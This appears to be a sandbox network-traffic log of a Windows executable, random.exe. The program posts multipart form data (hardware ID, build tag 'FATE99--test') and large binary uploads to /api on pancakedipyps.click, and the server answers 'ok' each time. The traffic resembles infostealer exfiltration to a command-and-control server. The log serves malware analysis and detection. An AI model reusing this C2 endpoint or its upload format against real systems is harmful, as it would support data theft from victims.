66 37 72 Data Ascii: Q2/GqVeoe+IaIDThW9ndWXFVzpuTqWDY/z7JdlVue4UTfoK1Xn0+sY+1YvUPWltKsIMETwA5qou+91bphuL7AxT6hP6Csb3zzHEjdJyZ2NlhBRwLgbmkXH7nUusAOu8VQ2/GqVeoe+IaIDThW9ndWXFVzpuTqWDY/z7JdlVue4UTfoKpGnX2PYOx57LcyA7NMIaaHMI/qwg84UksBumr1od2AblSebv2X31k8J8MT0yjRsGSmnm2yC9hUOsFf7r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	188.114.97.3	443	6940	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:46:59 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=83PVIUVIGUHSL4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18138 Host: pancakedipyps.click
2025-01-08 10:46:59 UTC	15331	OUT	Data Raw: 2d 2d 38 33 50 56 49 55 56 49 47 55 48 53 4c 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 35 39 32 37 31 37 39 44 30 46 44 44 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 38 33 50 56 49 55 56 49 47 55 48 53 4c 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 33 50 56 49 55 56 49 47 55 48 53 4c 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 38 33 50 56 49 55 56 49 47 Data Ascii: --83PVIUVIGUHSL4Content-Disposition: form-data; name="hwid"12F5927179D0FDD2822D1F4978021086--83PVIUVIGUHSL4Content-Disposition: form-data; name="pid"2--83PVIUVIGUHSL4Content-Disposition: form-data; name="lid"FATE99--test--83PVIUVIG
2025-01-08 10:46:59 UTC	2807	OUT	Data Raw: 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 Data Ascii: (u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2025-01-08 10:47:01 UTC	1126	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 10:47:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ogp7soeimnslss48u9bvobqtee; expires=Sun, 04 May 2025 04:33:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bnvdd5Sk1rvbXXnstMMoL95NkR2RnnpmPxo5TwDRdUJSYDT3TCaMQ2rF4NRonDj4c%2FN3HSgMPLI4wnzGAaJVFUDnJEYqOz33aHK8tVuI95NwxrC1MzxN3DCkya4qC9YCQAZq85U8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8feb9b605f4d0f8b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1529&min_rtt=1529&rtt_var=574&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19099&delivery_rate=1909744&cwnd=237&unsent_bytes=0&cid=b7306fecb02204f2&ts=2078&x=0"
2025-01-08 10:47:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-08 10:47:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	188.114.97.3	443	6940	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:47:02 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=52X1V2I4DH724C User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8759 Host: pancakedipyps.click
2025-01-08 10:47:02 UTC	8759	OUT	Data Raw: 2d 2d 35 32 58 31 56 32 49 34 44 48 37 32 34 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 35 39 32 37 31 37 39 44 30 46 44 44 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 35 32 58 31 56 32 49 34 44 48 37 32 34 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 32 58 31 56 32 49 34 44 48 37 32 34 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 35 32 58 31 56 32 49 34 44 Data Ascii: --52X1V2I4DH724CContent-Disposition: form-data; name="hwid"12F5927179D0FDD2822D1F4978021086--52X1V2I4DH724CContent-Disposition: form-data; name="pid"2--52X1V2I4DH724CContent-Disposition: form-data; name="lid"FATE99--test--52X1V2I4D
2025-01-08 10:47:03 UTC	1131	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 10:47:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0sjaed3t7smp46184q3k9vakik; expires=Sun, 04 May 2025 04:33:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mNxAJVKm1gzni%2B8DxramevHjJH2CvARnIAUeL2wxhTpptt5qfvpdQBE8Hqh0pVzAtxX9EUgHyqL5XEMylBL0%2Bwfh9LuSpRuZ1v15PZlQO2%2F7o%2F6C8Wyowk3hMzuHv1Y3QzxV%2BxcW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8feb9b7049ef1879-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1463&rtt_var=570&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9697&delivery_rate=1882656&cwnd=162&unsent_bytes=0&cid=81b0f7e2e496915b&ts=641&x=0"
2025-01-08 10:47:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-08 10:47:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	188.114.97.3	443	6940	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:47:03 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=97RJBEUIGRL98E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20412 Host: pancakedipyps.click
2025-01-08 10:47:03 UTC	15331	OUT	Data Raw: 2d 2d 39 37 52 4a 42 45 55 49 47 52 4c 39 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 35 39 32 37 31 37 39 44 30 46 44 44 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 39 37 52 4a 42 45 55 49 47 52 4c 39 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 37 52 4a 42 45 55 49 47 52 4c 39 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 39 37 52 4a 42 45 55 49 47 Data Ascii: --97RJBEUIGRL98EContent-Disposition: form-data; name="hwid"12F5927179D0FDD2822D1F4978021086--97RJBEUIGRL98EContent-Disposition: form-data; name="pid"3--97RJBEUIGRL98EContent-Disposition: form-data; name="lid"FATE99--test--97RJBEUIG
2025-01-08 10:47:03 UTC	5081	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2025-01-08 10:47:04 UTC	1131	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 10:47:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9cf6r792q4e6ptabpgv8ra1c40; expires=Sun, 04 May 2025 04:33:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kergP1V%2FhrPvPu700DDFRSlTmTVFaoRC%2FCl%2FYD8bkctzOTZLJHNAFSnXs0kCcvUVOmZOx3YtStoUvv9D9tQXF6IsdRk3YFIJqXvFxsh9IUeMXYNzq%2BNZSXxen6leik8McUTLMspL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8feb9b79bf0842ea-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1728&rtt_var=657&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2849&recv_bytes=21373&delivery_rate=1654390&cwnd=143&unsent_bytes=0&cid=2ffd71f01b5ec7c9&ts=648&x=0"
2025-01-08 10:47:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-08 10:47:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	188.114.97.3	443	6940	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:47:05 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BMBE9NGHHGBJRN9PVAB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 988 Host: pancakedipyps.click
2025-01-08 10:47:05 UTC	988	OUT	Data Raw: 2d 2d 42 4d 42 45 39 4e 47 48 48 47 42 4a 52 4e 39 50 56 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 35 39 32 37 31 37 39 44 30 46 44 44 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 42 4d 42 45 39 4e 47 48 48 47 42 4a 52 4e 39 50 56 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 4d 42 45 39 4e 47 48 48 47 42 4a 52 4e 39 50 56 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 Data Ascii: --BMBE9NGHHGBJRN9PVABContent-Disposition: form-data; name="hwid"12F5927179D0FDD2822D1F4978021086--BMBE9NGHHGBJRN9PVABContent-Disposition: form-data; name="pid"1--BMBE9NGHHGBJRN9PVABContent-Disposition: form-data; name="lid"FATE99--te
2025-01-08 10:47:05 UTC	1133	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 10:47:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gu59cvrhupfs9mokctkt34ml2v; expires=Sun, 04 May 2025 04:33:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i70zf5dUZpZR8BLeAQ8bYYii6hUl5ME8WAJFDKZx1Z37iDiB0kbiD0Qax7qu%2FOGAYAzIm%2BdWOgwqwZgLERmRczSgELESjyAK%2BMks9p%2FfFn%2FH14Kyv%2F6Jlon93%2BQLC7VataJrLKXM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8feb9b819c9d0ca2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1674&rtt_var=636&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1908&delivery_rate=1709601&cwnd=32&unsent_bytes=0&cid=5d6ecc82cc216db1&ts=474&x=0"
2025-01-08 10:47:05 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-08 10:47:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	188.114.97.3	443	6940	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:47:06 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ZR3AKJC6S0A User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 584031 Host: pancakedipyps.click
2025-01-08 10:47:06 UTC	15331	OUT	Data Raw: 2d 2d 5a 52 33 41 4b 4a 43 36 53 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 46 35 39 32 37 31 37 39 44 30 46 44 44 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 5a 52 33 41 4b 4a 43 36 53 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 52 33 41 4b 4a 43 36 53 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 5a 52 33 41 4b 4a 43 36 53 30 41 0d 0a 43 6f 6e 74 65 Data Ascii: --ZR3AKJC6S0AContent-Disposition: form-data; name="hwid"12F5927179D0FDD2822D1F4978021086--ZR3AKJC6S0AContent-Disposition: form-data; name="pid"1--ZR3AKJC6S0AContent-Disposition: form-data; name="lid"FATE99--test--ZR3AKJC6S0AConte
2025-01-08 10:47:06 UTC	15331	OUT	Data Raw: c9 db 26 b3 dc 9c 26 ba f5 8a 9a 54 e2 a0 bd 4f e8 62 96 2a 36 a2 22 fe 38 13 78 1f 84 ca 2e d5 cc 94 5e e3 c7 0d 0c 6e e5 15 12 1f c3 5e ea 84 81 12 a5 4a 04 fd 79 7a a3 a1 36 66 e8 c8 d9 49 ed f0 bf 3e ee 13 b5 c1 dc 6e e9 27 38 f3 3f 2f 3c 38 b5 66 3e 23 d3 55 f5 20 5b 1d cd 9e 56 37 65 bf 7f 9f 0a d1 77 98 0a d9 d0 57 cd 3b d8 54 3d 51 0d 4a 92 f6 84 14 de 9d 69 e9 e2 3c 93 5f 81 1b e4 ef 81 b6 a0 ea e8 de 84 d3 9c 1d b3 85 26 61 ee 87 52 f6 e2 a6 19 43 2e 6e 3e ca 5d ab bc 21 bc 0d e7 f3 d7 d7 6b 0e 52 cf b3 d3 e7 7d 62 84 01 d0 8b a0 5a a3 52 68 96 45 62 f4 9f e2 dd ab 27 fd 96 bf 84 e7 80 1e 61 df db ba 4f 40 4f 35 60 07 ef 5e 4f 3e f8 c9 75 35 a5 2c b0 d3 4d 85 ef 3e 1b 75 9a 6d 36 b7 b9 ce 3b 49 91 25 53 61 2f 26 ff ac 41 fc d6 89 43 3f 3a 88 7a Data Ascii: &&TOb*6"8x.^n^Jyz6fI>n'8?/<8f>#U [V7ewW;T=QJi<_&aRC.n>]!kR}bZRhEb'aO@O5`^O>u5,M>um6;I%Sa/&AC?:z
2025-01-08 10:47:06 UTC	15331	OUT	Data Raw: 37 5e 51 6c 14 d8 93 9a 5e 36 42 c1 f3 a3 71 1c a0 f8 a9 18 ec cf 9b 29 ed be f1 e4 30 41 25 20 bd 8b 29 37 9b ad 63 e9 5c 67 6d 84 12 f5 b2 78 1e cd c1 20 d8 4d 59 1b ca 7b a1 10 4d 1f da 02 8b 1e 87 cc 2e 36 48 0a ea ba 9d 7f af 74 c1 6f 5f a4 90 da eb 54 1a e1 3b 2d 33 03 4e e0 f3 85 a0 93 17 55 7f df 61 2b 09 22 99 84 41 74 93 dd e5 3c ce 15 31 6c 66 2b cc 2f f6 7a 3d 09 e0 9b b4 be b3 d9 fd 55 40 b9 a6 12 ab b9 e6 d5 f5 34 d4 ce 65 63 e0 31 ac cc e9 36 83 6e 9d 46 cc ef e5 71 1a 6d 85 a8 fb 30 27 25 cf 93 3a 18 91 5e bc 31 84 e7 11 df 78 44 5d 21 de 87 0e 95 e2 ec f3 0c e0 f8 bd f9 87 40 f9 bf c8 c0 d8 9c 2f 8e da fb a2 eb 87 b7 4b 6f 4a 47 85 fb 4e 5d 03 66 22 32 cb 8d 05 39 17 73 5d ec 61 4e d6 46 58 07 47 fb 03 c7 34 86 95 e0 cc e1 63 67 24 53 c8 Data Ascii: 7^Ql^6Bq)0A% )7c\gmx MY{M.6Hto_T;-3NUa+"At<1lf+/z=U@4ec16nFqm0'%:^1xD]!@/KoJGN]f"29s]aNFXG4cg$S
2025-01-08 10:47:06 UTC	15331	OUT	Data Raw: 24 1a 83 95 94 8b ac 3f 7a 06 fd c7 52 87 66 9e 87 af 40 39 c8 e0 8b 0e c4 ae c4 ed ea 23 77 5f 35 df b2 36 7e c4 b0 e9 08 f2 00 82 90 73 cf 39 bb 02 c5 df 9d 55 4b 83 b5 2a 05 9c d3 03 42 64 5f ce 51 f6 18 0a 84 67 b7 d4 4a 64 5c fe 2f 7e 7f dc b9 e1 23 7d e1 cb 27 ef 0b 16 9d 03 5b 6c e6 05 cf d7 dc 1d 08 a0 04 78 6d 55 ee c1 56 77 5f b0 3f 1f 55 2d aa 5d 2a 00 0e 25 10 d9 90 eb bc b4 89 db 42 a9 fc 36 91 52 59 90 c7 22 fa d5 dd 89 8a 17 4e a9 f0 bd bd 09 3c e7 cb 4c 88 a6 80 b4 65 18 d9 cf 0d 6f a6 d0 37 22 ef 70 4e 42 bc 09 f0 c8 a5 0c 80 fc 4e 10 bf 9b f9 72 79 f4 3c 41 f4 39 c3 40 4f 5d f2 3e a4 b6 8e 00 9a 01 1e 50 88 8b 65 b5 0d b0 9a bc e0 53 10 21 f7 69 51 09 4f 7a 4a e1 e9 3a fa 4f f5 2f cc 9d 95 82 00 ea f1 af f3 86 00 57 b1 b3 cc e4 b3 b2 0a Data Ascii: $?zRf@9#w_56~s9UKBd_QgJd\/~#}'[lxmUVw_?U-]%B6RY"N<Leo7"pNBNry<A9@O]>PeS!iQOzJ:O/W
2025-01-08 10:47:06 UTC	15331	OUT	Data Raw: 50 78 ad 69 8d 47 a9 29 45 45 b2 07 84 eb f9 72 45 70 8a 7e 4a 07 b9 b9 d1 21 8e d0 2b d9 75 d2 ca e7 a5 35 1a 56 2c a9 39 d7 54 e4 b7 9b c4 18 34 d4 55 75 2b a1 be 33 f2 9e 98 c5 5e 11 97 09 3e 54 6b 25 09 4e dc 68 bc b4 e3 2d 30 e7 b8 37 9a ed 08 7d ed 87 cf f7 d7 cf 6c 8e fc e8 d3 93 62 cb 6b 34 d2 66 5a f6 6b 8f 46 c4 c6 a4 31 78 42 a1 78 79 d7 2f f7 2b 57 cb 54 00 cd 55 65 70 7a 09 32 ab 0e b7 cb 51 51 c5 cf 87 b6 af ac f9 8d b6 6d 58 56 b4 ac bd de 74 8b 8b ac 5b 57 3b c8 93 a8 a2 32 d0 b8 11 ef 71 48 24 cd 90 8b da 06 ec 4d f3 34 43 7f 8e 8e 72 db 80 16 04 ff 7d 4f c5 61 92 69 05 27 e4 47 b4 68 f3 dd c1 55 ef 74 92 43 5e 2d 57 86 d3 3a c5 93 78 18 10 2f 10 5b 1c 44 11 da 42 73 d6 20 be 42 03 bc 73 15 1a 2d b0 8e 82 97 1a a6 ce 3d 12 1f 3e 8f 66 d6 Data Ascii: PxiG)EErEp~J!+u5V,9T4Uu+3^>Tk%Nh-07}lbk4fZkF1xBxy/+WTUepz2QQmXVt[W;2qH$M4Cr}Oai'GhUtC^-W:x/[DBs Bs-=>f
2025-01-08 10:47:06 UTC	15331	OUT	Data Raw: 79 9d 96 23 b1 29 26 3d 1d 52 b2 85 dd da 9b 32 62 b1 37 f3 06 be ac c1 44 66 02 9a 1f be c7 08 5c 74 95 0f d5 77 6e ad 31 f6 c4 88 9c a9 42 e0 bc 54 72 cc a2 78 6b c8 e3 d4 b1 d9 e4 6a 87 03 5e 13 7d 6a 85 e9 05 a2 33 64 a4 f9 24 df f7 22 5f c1 be 18 2f 75 9d ec 5d ca ea 18 55 c0 0b 89 8a 32 d7 e6 53 0b b1 fd fe 99 2e 36 93 02 87 75 9a bd 7d b7 f6 09 25 27 ec cd d3 e1 f2 e9 25 42 46 9e a0 f8 d0 c8 0e 90 b9 70 8e d9 c0 38 74 d9 23 d6 14 cb 9a fa 58 f0 a9 b2 0b 72 4b 09 13 40 8e b0 23 7e c5 3f 21 d2 08 d8 c5 5c 9e a9 81 69 a0 46 25 6c 72 7a 26 a7 19 07 f6 ab b5 db c3 8f c1 8c 62 f5 7f 8c 92 d6 e0 c9 d6 2b 3c 81 7b 01 0b aa f2 bd 48 a4 f9 91 53 95 33 d5 c3 07 5e e9 ee fa ea dc 3b dd 9a 56 72 e7 3f 3a 44 77 a5 98 84 83 c5 68 11 8e 23 cf 4f 16 85 06 d7 4e 11 Data Ascii: y#)&=R2b7Df\twn1BTrxkj^}j3d$"_/u]U2S.6u}%'%BFp8t#XrK@#~?!\iF%lrz&b+<{HS3^;Vr?:Dwh#ON
2025-01-08 10:47:06 UTC	15331	OUT	Data Raw: 7f 5f b9 5b fa ad f6 9f 57 77 ca f6 95 2e 4d ea ee 26 70 7b 5b ff ae e2 fe 19 de 43 d8 58 4a 6b c5 2e be 52 06 3d 69 02 83 14 18 16 11 30 a9 da bc 2e 0a d2 18 60 b1 6e fc f7 21 90 8d 82 99 da 99 5a 38 0b 40 c8 86 50 08 84 38 58 17 87 72 5e 0f a8 fd 3a 8d e4 85 52 70 72 cb ec 83 3d 06 08 5e b8 28 7e 78 3f 21 6b f3 62 7f fa 47 8d ef 3b 45 4c d1 e1 30 fc ac e9 f2 72 77 77 e5 9f 85 ab a2 a9 61 6c c3 1c b3 0f 31 2c 6f ef 0d f7 17 8f 20 52 86 17 fd 10 98 b5 f6 16 06 22 82 d8 16 c9 ed e6 88 bc e5 f5 92 47 cd b7 2f 8b 6a e2 79 29 b6 ff e8 d2 c3 0b 9e f8 b6 7f e0 55 79 a8 4b 0e 96 87 ee 94 82 20 0c 7c 08 83 7f b7 0b 2f 80 f8 33 95 9e 2d 68 33 56 e5 c7 47 3f fe 76 3c 5d 00 5c fa c1 8e fd 01 0a 5b 88 35 95 49 41 38 1b eb 49 ce ad 99 5c 9e da 92 49 33 e0 1c 91 cf 6e Data Ascii: _[Ww.M&p{[CXJk.R=i0.`n!Z8@P8Xr^:Rpr=^(~x?!kbG;EL0rwwal1,o R"G/jy)UyK \|/3-h3VG?v<]\[5IA8I\I3n
